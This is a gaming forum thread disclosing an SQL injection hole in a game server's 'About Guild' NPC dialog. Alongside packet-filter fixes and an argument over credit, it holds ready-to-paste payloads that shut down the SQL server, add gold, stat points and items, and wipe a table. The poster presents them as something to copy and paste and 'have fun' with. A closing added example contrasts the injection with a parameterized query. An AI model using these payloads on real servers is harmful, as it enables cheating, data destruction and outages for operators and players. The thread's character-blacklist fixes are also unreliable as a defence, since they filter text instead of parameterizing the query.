[INFORMATION] SQL Injection (ingame)

09/05/2016 21:12 Syloxx#1
Hello Elitepvpers,

I just want to inform you that I discovered a new, very harmful exploit.

It is possible to execute a SQL Injection through the Fortresswar Administrator NPC with the "About Guild" dialog.

Requirements:
Quote:
- own a Fortresswar
- be the Guild Master
Example:
Code:
test' shutdown--
This example will shut down the SQL server.

Screenshot:

09/05/2016 21:43 Goofie#2
Fix for packet filters
PHP Code:
#region 0x705E_CLIENT_EXPLOIT
if (_pck.Opcode == 0x705E)
{
    // "About Guild" text the client sends to the Fortresswar Administrator NPC
    string message = _pck.ReadAscii();
    if (message.Contains("'"))
    {
        //message;
        continue;   // drop the packet instead of forwarding it to the GameServer
    }
    else if (message.Contains("\""))
    {
        //message;
        continue;
    }
    else if (message.Contains("-"))
    {
        //message;
        continue;
    }
}
#endregion
09/05/2016 22:33 timoman#3
thanks Goofie
09/05/2016 22:33 Exo#4
Quote:
Originally Posted by Goofie
Fix for packet filters
PHP Code:
// requires using System.Linq;
if (new[] { '-', '\\', '\'' }.Any(a => message.Contains(a)))
{
    //message;
    continue;
}
short qode, qood qode. Also, I think SQL parsers are better for analyzing such strings.
09/06/2016 00:53 OutlawNL#5
Doesn't work on sro-r at least hihi
09/06/2016 01:06 Exelja#6
Quote:
Originally Posted by OutlawNL
Doesn't work on sro-r at least hihi
Or you just messed up when trying it :D
09/06/2016 05:54 Tazdingo7#7
Credits for the pic (? xD

Some funny sql injections you can do without any error at gameserver:

1. Add Gold to your character
a'; UPDATE _Char SET RemainGold = 99999999999 WHERE CharName16 = 'YourName'; UPDATE _SiegeFortress SET Introduction = 'a

2. Add more stats to your character
a'; UPDATE _Char SET RemainStatPoint = 99999 WHERE CharName16 = 'YourName'; UPDATE _SiegeFortress SET Introduction = 'a

3. If you know the item codes, why not create some of them?
a'; exec _ADD_ITEM_EXTERN 'Charname','ITEM_EU_TSWORD_11_SET_A_RARE',0,20; UPDATE _SiegeFortress SET Introduction = 'a

If you want to fuck off the database (don't do it if you are not the server admin, ok no):
a'; UPDATE _Items SET RefItemID = 0; UPDATE _SiegeFortress SET Introduction = 'a

Just copy & paste these injections into the fortress dialog.

Have fun.
09/06/2016 07:24 sarkoplata#8
just another simple reason to use the beautiful BR files
09/06/2016 10:05 Syloxx#9
Quote:
Originally Posted by WickedNite.
You fucking leecher.


Really? You discovered? Go fuck yourself.
Yes, I discovered them by myself by checking the GameServer logs.
A Guild Master wrote "we're".

Just because MegaMax said he told me that doesn't mean it's true (actually I was unsure, so I checked the whole Skype history and I couldn't find anything about an SQL injection).

So if you think to talk about shit without even asking the other side, go fuck yourself.

Srsly, that's Camel Level: "I have no clue what's up but I am a fanboy of Mega so it must be true!"

Pff, shame on you.
09/06/2016 10:26 MeGaMaX#10
Quote:
Originally Posted by Syloxx
Yes, I discovered them by myself by checking the GameServer logs.
A Guild Master wrote "we're".

Just because MegaMax said he told me that doesn't mean it's true (actually I was unsure, so I checked the whole Skype history and I could find anything about an SQL injection).

So if you think to talk about shit without even asking the other side, go fuck yourself.

Srsly, that's Camel Level: "I have no clue what's up but I am a fanboy of Mega so it must be true!"

Pff, shame on you.
"(actually I was unsure so I checked the whole Skype history and I could find anything about an SQL injection)"

^ How, if you blocked me from Skype yourself?

Srsly? It was on the Discord epvp #main channel before you quit it, I wrote it publicly and you said you would check it, I said ok. But look, I don't wanna be rude because there is no reason to, but if you are going to force me to be, it won't go to any good level.

You are the one who is on Srsly that's Camel Level: :cool:

Shame on you Syloox, never thought you would be owned by anyone, or because he did the vsro 274 bot for you? :rolleyes:
09/06/2016 10:44 Syloxx#11
Quote:
Originally Posted by MeGaMaX.
"(actually I was unsure so I checked the whole Skype history and I could find anything about an SQL injection)"

^ How, if you blocked me from Skype yourself?

Srsly? It was on the Discord epvp #main channel before you quit it, I wrote it publicly and you said you would check it, I said ok. But look, I don't wanna be rude because there is no reason to, but if you are going to force me to be, it won't go to any good level.

You are the one who is on Srsly that's Camel Level: :cool:

Shame on you Syloox, never thought you would be owned by anyone, or because he did the vsro 274 bot for you? :rolleyes:
1st of all, I never blocked you; I just removed you from contacts, because we weren't actively talking anymore (I like to clean up my Skype contacts periodically).
2nd, the Skype history is stored on my iPhone.
3rd, I reported that to Weeman because a friend of mine uses his filter.
4th, about Discord: I was there only once for maybe 15 mins and I didn't even communicate with you there.

So if you are 100% sure I wrote it, then someone just used my name (for those 15 min I didn't even have Syloxx as name, I had something like "SpidyForceMeToBeHere").
09/06/2016 11:19 rares495#12
Seriously who cares about who found it? Important thing is that it's known and will be fixed.
09/06/2016 14:09 Hedgehock#13
Creating a new instance of LogWriter on every call? DAFAQ.
Also, you can return after executing CleanClient.
09/06/2016 15:08 Gidzy#14
:D ?
09/06/2016 16:50 tschulian#15
Quote:
Originally Posted by Hedgehock
Creating a new instance of LogWriter on every call? DAFAQ.
Also, you can return after executing CleanClient.
Yeah, this was the first hotfix (disconnecting the exploiter).
I rewrote it to replace the corresponding strings with *.

About the LogWriter: indeed it's newly created, but guess how often someone uses the About Guild function? ;)
It's used so little that it took about 8 years to find that leak which makes SQL injections possible. So, sorry, you model :*

Quote:
Originally Posted by Gidzy
:D ?
You messed something up.
Check your code again.
Code:
test'; update _Char set RemainStatPoint = 999 where CharName16 = 'yourCharnameHere';--
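Both fixes in the thread (dropping the packet on ', " and -, later replacing those characters with *) work on the text instead of on the query. As an added example that is not code from the thread or from any server project, this reproduces the About Guild bug on a constructed in-memory SQLite schema and puts the parameterized statement next to it; it is Python rather than the filter's C# so it runs stand-alone, and only the table and column names (_SiegeFortress.Introduction, _Char.RemainStatPoint, CharName16) are taken from the payloads posted above.

```python
"""Added example (not from the thread): the About Guild injection on a
constructed SQLite schema, beside the parameterized fix."""
import sqlite3

# Characters the packet filter posted by Goofie drops the message on.
BLOCKED = ("'", '"', "-")

# Payload quoted from tschulian's post; the trailing -- comments out the
# closing quote the server appends after the dialog text.
PAYLOAD = ("test'; update _Char set RemainStatPoint = 999 "
           "where CharName16 = 'yourCharnameHere';--")


def blacklist_filter(message: str) -> bool:
    """Mirror of the thread's filter: True means the packet is dropped."""
    return any(ch in message for ch in BLOCKED)


def fresh_db() -> sqlite3.Connection:
    """Constructed schema with one fortress and one character."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE _SiegeFortress (FortressID INTEGER PRIMARY KEY, Introduction TEXT);
        CREATE TABLE _Char (CharName16 TEXT PRIMARY KEY, RemainStatPoint INTEGER);
        INSERT INTO _SiegeFortress VALUES (1, '');
        INSERT INTO _Char VALUES ('yourCharnameHere', 0);
    """)
    return conn


def stat_points(conn: sqlite3.Connection) -> int:
    return conn.execute("SELECT RemainStatPoint FROM _Char "
                        "WHERE CharName16 = 'yourCharnameHere'").fetchone()[0]


def set_intro_concatenated(conn: sqlite3.Connection, text: str) -> int:
    """Vulnerable shape: dialog text spliced into the statement, so the
    ; in the payload starts a second statement. Returns the stat points."""
    conn.executescript("UPDATE _SiegeFortress SET Introduction = '" + text + "'")
    return stat_points(conn)


def set_intro_parameterized(conn: sqlite3.Connection, text: str) -> int:
    """Fixed shape: the text is bound, so quotes, ; and -- stay data."""
    conn.execute("UPDATE _SiegeFortress SET Introduction = ?", (text,))
    return stat_points(conn)


def stored_intro(conn: sqlite3.Connection) -> str:
    return conn.execute("SELECT Introduction FROM _SiegeFortress").fetchone()[0]
```

The character filter also drops a legitimate introduction such as "we're the best guild", the kind of apostrophe that surfaced the bug in the GameServer logs, while the bound parameter stores the payload verbatim as text and leaves _Char untouched.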